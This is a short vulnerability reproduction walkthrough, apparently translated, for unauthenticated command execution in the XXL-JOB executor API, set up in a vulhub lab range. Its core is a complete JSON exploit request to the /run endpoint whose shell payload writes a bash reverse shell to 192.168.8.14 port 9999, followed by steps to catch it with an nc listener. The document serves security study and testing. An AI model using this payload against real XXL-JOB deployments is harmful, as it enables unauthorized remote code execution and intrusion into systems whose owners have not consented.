Table of contents
1. Vulnerability description
XXL-JOB is a distributed task scheduling platform. Its core design goals are rapid development, easy learning, lightweight, and easy expansion. The source code is now open and connected to the online product lines of many companies, out of the box. XXL-JOB is divided into admin and executor. The former is the background management page, and the latter is the client for task execution. The executor does not configure authentication by default, and unauthorized attackers can execute arbitrary commands through the RESTful API.
2. Shooting range construction
The shooting range uses vulhub
to enter the vulhub/xxl-job/unacc directory, execute docker-compose up -d
the container, docker ps -a
look at
the browser and access http://your-ip:9999
to see the above picture, indicating that the vulnerability environment is deployed successfully.
3. Vulnerability recurrence (reverse shell)
Browser access http://your-ip:9999/run, and capture packets through bp
Modify the request method to POST
, and write exp, and then send the request
exp:
{
"jobId": 1,
"executorHandler": "demoJobHandler",
"executorParams": "demoJobHandler",
"executorBlockStrategy": "COVER_EARLY",
"executorTimeout": 0,
"logId": 1,
"logDateTime": 1586629003729,
"glueType": "GLUE_SHELL",
"glueSource": "echo 'bash -i >& /dev/tcp/192.168.8.14/9999 0>&1' > /tmp/1.sh",
"glueUpdatetime": 1586699003758,
"broadcastIndex": 0,
"broadcastTotal": 0
}
Grant executable permission to /tmp/1.sh Enable
nc monitoring
Execute command:
check nc monitoring, the rebound is successful